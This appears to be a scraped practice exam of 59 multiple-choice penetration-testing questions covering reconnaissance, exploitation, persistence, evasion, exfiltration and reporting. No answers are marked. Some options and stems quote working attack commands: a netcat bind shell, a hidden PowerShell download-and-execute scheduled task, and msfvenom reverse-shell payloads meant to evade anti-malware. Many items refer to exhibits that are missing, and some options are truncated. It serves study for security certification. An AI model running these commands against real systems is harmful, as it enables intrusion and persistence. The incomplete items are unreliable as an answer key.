
Pentest Test 4

Title of test:
Pentest Test 4

Description:
Pentest 4

Creation Date: 2026/03/11

Category: Others

Number of questions: 59

Content:

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?. Lock picking. Impersonating. Jamming. Tailgating. Bypassing.

A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?. nc -e /bin/sh -lp 53. /bin/sh -c 'nc -l -p 443'. nc -e /bin/sh 53. /bin/sh -c 'nc 443'.

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan: Which of the following tools should the tester use to quickly identify a potential attack path?. msfvenom. SearchSploit. sqlmap. BeEF.

A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?. curl https://api.shodan.io/shodan/host/search?key=&query=hostname:. proxychains nmap -sV -T2. for i in ; do curl -k $i; done. nmap -sV -T2.

A penetration tester needs to confirm the version number of a client’s web application server. Which of the following techniques should the penetration tester use?. SSL certificate inspection. URL spidering. Banner grabbing. Directory brute forcing.

A penetration tester wants to identify all the TLS versions used in a web service in order to determine potentially insecure versions. Which of the following commands should the tester use?. nmap --script ssl-enum-ciphers. curl --tls-max 3. wget --server-response. openssl version.

Eight months after the completion of a penetration test, the client emails the penetration tester to debate the validity of several findings. The findings are now posing a hindrance to compliance certifications. Which of the following would most likely assist the penetration tester with de-escalation?. Testing methodology. Terms of use. Business impact analysis. Client acceptance.

A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?. for user in. spray365.py. import requests.pathlib. hydra -L users.txt.

A tester obtained access to a computer using an SMB exploit and now has shell access to the target computer. The tester runs the following on the obtained shell: schtask /create /tn Updates /tr "C: \windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.1.2/asd')))'" /sc onlogon /ru System Which of the following does this action accomplish?. Upgrades the shell performing a privilege escalation activity. Uses the Windows Update service to move the shell connection and avoid detection. Maintains access into the compromised computer. Forwards all the communication from the compromised host to the host 10.10.1.2.

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?. Clear the Windows event logs. Modify the system time. Alter the log permissions. Reduce the log retention settings.

A penetration tester is assessing the overall preparedness of a client's staff for text-message-based attacks. Which of the following most accurately describes the attack technique the tester is assessing?. Whaling. Vishing. Wardriving. Smishing.

A penetration tester attempts to access an internet-facing web page while conducting research on site. However, the web page is no longer accessible. Which of the following is the best step for the tester to take to continue gathering details?. Change the proxy settings. Try a different user agent in the browser. Locate a cached version of the page. Ask to have the site unblocked.

A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?. Goal reprioritization. Peer review. Client acceptance. Stakeholder alignment.

Which of the following is a reason to use a template when creating a penetration testing report?. To articulate risks accurately. To enhance the testing approach. To contextualize collected data. To standardize needed information. To improve testing time.

During a security audit, a penetration tester wants to exploit a vulnerability in a common network protocol. The protocol allows encrypted communications to be intercepted and manipulated. Which of the following vulnerabilities should the tester exploit?. CVE-202W-ZZZZ: Cisco ASA IKEv2/IPSec Fragmentation Vulnerability. CVE-202Y-XXXX: Wireshark SSL/TLS Decryption Vulnerability. CVE-202X-YYYY: OpenSSL DROWN Attack. CVE-202Z-WWWW: Microsoft SMBv1 EternalBlue Exploit.

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?. BeEF. John the Ripper. ZAP. Evilginx.

A penetration tester is trying to execute a post-exploitation activity and creates the following script: Which of the following best describes the tester's objective?. To download data from an API endpoint. To download data from a cloud storage. To exfiltrate data over alternate data streams. To exfiltrate data to cloud storage.

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?. Configuration changes were not reverted. A full backup restoration is required for the server. The penetration test was not completed on time. The penetration tester was locked out of the system.

A penetration tester completed OSINT work and needs to identify common subdomains for mydomain.com. Which of the following is the best command for the tester to use?. nslookup mydomain.com >> /path/to/results.txt. crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com. dig @8.8.8.8 mydomain.com any >> /path/to/results.txt. cat wordlist.txt | xargs -n 1 -I 'X' host X.mydomain.com.

Which of the following should a penetration tester do when conducting post-engagement cleanup?. Return the system to its original state. Close any open ports. Shut down the infected system. Delete all activity logs.

While performing a red-team exercise, a penetration tester uses a reading device to extract data from an employee's access badge. The tester creates a copy for unauthorized entry. Which of the following best describes this attack?. Smurfing. Card skimming. On-path attack. Credential stuffing.

Which of the following security controls should be implemented when systems that are covered by a compliance agreement are maintained separately from other elements of an organization's infrastructure?. Key management. Network monitoring. Data isolation. Penetration test.

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?. nmap -sU -sW -p 1-65535 example.com. nmap -sU -sY -p 1-65535 example.com. nmap -sU -sT -p 1-65535 example.com. nmap -sU -sN -p 1-65535 example.com.

A penetration tester gains access to a domain member server and wants to identify which potential targets are available to attack. Which of the following tools should the penetration tester use?. Netstat. Wireshark. Nmap. Responder.

During a web application assessment, a penetration tester identifies an administrative tool that would allow for the production database to be deleted without authorization. Which of the following is most important for the penetration tester to consider before proceeding with testing?. Rules of engagement. Business continuity planning. Agreed-upon testing hours. Application terms of use.

A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?. Perform information-gathering techniques to review internet-facing assets for the company. Perform a phishing assessment to try to gain access to more resources and users’ computers. Perform a physical security review to identify vulnerabilities that could affect the company. Perform a vulnerability assessment over the main domain address provided by the client.

The following file was obtained during reconnaissance: Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?. Exposure of other users’ sensitive data. Unauthorized access to execute binaries via sudo. Hijacking the default user login shells. Corrupting the skeleton configuration file.

A penetration tester uses a pair of crutches to access a client's physical location. Which of the following is the tester most likely trying to do?. Tailgating. Impersonation. Badge cloning. Lock picking.

A penetration tester creates the following Python script that can be used to enumerate information about email accounts on a target mail server: Which of the following logic constructs would permit the script to continue despite failure?. Add a do/while loop. Add an iterator. Add a try/except block. Add an if/else conditional.

A penetration tester obtained a shell on a Windows system. Which of the following would the tester use to gather more information about the host?. mmc.exe. icacls.exe. nltest.exe. winver.exe.

During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?. Nikto. Burp Suite. Smbclient. theHarvester.

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?. Privilege Escalation. DOM injection. Session hijacking. Cross-site scripting.

A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server. Which of the following account types should the tester provide to the scanner?. Read-only. Domain Administrator. Local user. Root.

A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster. Which of the following tools would be best to use for this purpose?. NSE. Nessus. CME. Trivy.

As part of an engagement, a penetration tester needs to scan several hundred public-facing URLs for dangerous files or outdated web server versions. Which of the following should the tester use?. Nmap. ZAP. BloodHound. Nikto.

A penetration tester identifies the following vulnerability during a scan of the company's network: An Nmap scan of the affected device produces the following results: Which of the following best describes this scenario?. True Negative. True Positive. False Positive. False Negative.

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?. OWASP MASVS. OSSTMM. MITRE ATT&CK. CREST.

A penetration tester successfully gains access to a Linux system and then uses the following command: find / -type f -ls > /tmp/recon.txt Which of the following best describes the tester's goal?. Permission enumeration. Secrets enumeration. User enumeration. Service enumeration.

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?. FTP. HTTP. SMTP. DNS.

Which of the following should be included in a penetration test report to support the tester's detailed findings?. Methodologies. Screenshots. Vulnerabilities. Remediations.

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?. A collection of email addresses for the target domain that is available on multiple sources on the internet. DNS records for the target domain and subdomains that could be used to increase the external attack surface. Data breach information about the organization that could be used for additional enumeration. Information from the target's main web page that collects usernames, metadata, and possible data exposures.

A penetration tester wants to download sensitive files stored on the client's file server and runs the following scan: Which of the following TCP ports should the penetration tester target as a next step?. 21. 22. 80. 990.

A penetration tester enters an invalid user ID on the login page of a web application. The tester receives a message indicating the user is not found. Then, the tester tries a valid user ID with an incorrect password, and the web application indicates the password is invalid. Which of the following should the tester attempt next?. Error log analysis. DoS attack. Enumeration. Password dictionary attack.

A penetration tester is conducting an IoT assessment and dumps the device firmware to a Linux machine. Which of the following Bash scripts would locate secrets in a custom binary executable downloaded from the device?. cat initializedevice | strings | grep -i "password\|shadow\token". cat initializedevice | dos2unix | grep -i "password\|shadow\|token". cat initializedevice | base64 -d | grep -i "password\|shadow\|token". cat initializedevice | grep -i "password\|shadow\|token".

After completing vulnerability scans for a given test, a penetration tester needs to prioritize which potential assets are in scope and should be exploited first. Given the following scanner output: Which of the following findings should the tester prioritize first based upon a consideration of risk to the organization?. 1. 2. 3. 4.

A penetration tester uses a Python script to enumerate open ports across a list of IP addresses. The current script runs sequentially, which slows it down during larger engagements. The tester wants to improve the script’s performance so it can handle multiple targets simultaneously. Which of the following changes is the best way to achieve this goal?. Using the time.sleep() function to throttle the scanning rate. Importing a library that allows use of workers. Replacing the range() function with a while loop. Changing the port list from a tuple to a dictionary for better lookup speed.

A penetration tester sets up a C2 server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?. ProxyChains. Covenant. PsExec. sshuttle.

A penetration tester obtains a regular domain user’s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy. Which of the following tools should the penetration tester use to retrieve the password policy?. Responder. CrackMapExec. Hydra. msfvenom.

A penetration tester is investigating a buffer overflow on the myfile binary. The tester wants to send a payload to help identify the exact offset to inject the memory address to take control of the buffer. Which of the following would allow the penetration tester to quickly identify the offset?. ./myfile < $(printf 'A%.0s'{1.1000}. echo 'A' | head -n 1000 | tr -d '\n' | ./myfile. python -c 'print("A"*1000) > test.txt; cat test.txt >./myfile. ./pattern_create.rb 1000 > test.txt; ./myfile < test.txt.

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client’s blue team. Which of the following exfiltration methods would most likely remain undetected?. Cloud Storage. Email. Domain Name System. Test Storage Sites.

A penetration tester reviews the following output: Which of the following most likely describes the function of this system?. Enterprise Mail Server. Honeypot. Stand-alone web server. Domain Controller.

During a penetration test for a client that has a diverse infrastructure, the tester scans the network using Nmap and observes the following output: Which of the following would most likely be the target device?. Switch. SCADA. IoT. Router.

A tester compromises a shared host that is manually audited every week due to the absence of a SIEM. Which of the following is the best way to reduce the chances of being detected?. Modify files located in the /var/log directory. Use the clear command to remove recent terminal activity. Perform commands under one of the developer accounts. Disable all logging services on the host.

A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user. Which of the following is the most appropriate tool for this task?. BloodHound. Responder. Burp Suite. Hydra.

A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?. Enumerating cached pages available on web pages. Looking for externally available services. Scanning for exposed ports associated with the domain. Searching for vulnerabilities and potential exploits.

A penetration tester gains initial access to a Windows workstation on a client’s network. The tester wants to determine the next target but does not want to install software on the workstation. Which of the following is the best tool to list potential targets?. mmc.exe. Netstat. Mimikatz. explorer.exe. CME.

A penetration tester completes an authenticated vulnerability scan of a host and receives the following results: Which of the following is most likely to cause stability when a session is created on a target machine?. Running Responder with default settings and using impacket. Running Nmap with safe scripts enabled and targeting RDP. Running Metasploit utilizing the EternalBlue module. Running Hydra on the local user at one attempt per second.

A penetration tester uses the Intruder tool from the Burp Suite Community Edition while assessing a web application. The tester notices the test is taking too long to complete. Which of the following tools can the tester use to accelerate the test and achieve similar results?. TruffleHog. Postman. Wfuzz. WPScan.

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by anti-malware that is running on the target. Which of the following commands should the tester use to obtain shell access?. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000. msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST-10.10.10.100 LPORT-4444 EXITFUNC=none. net user add /administrator | hexdump > payload.
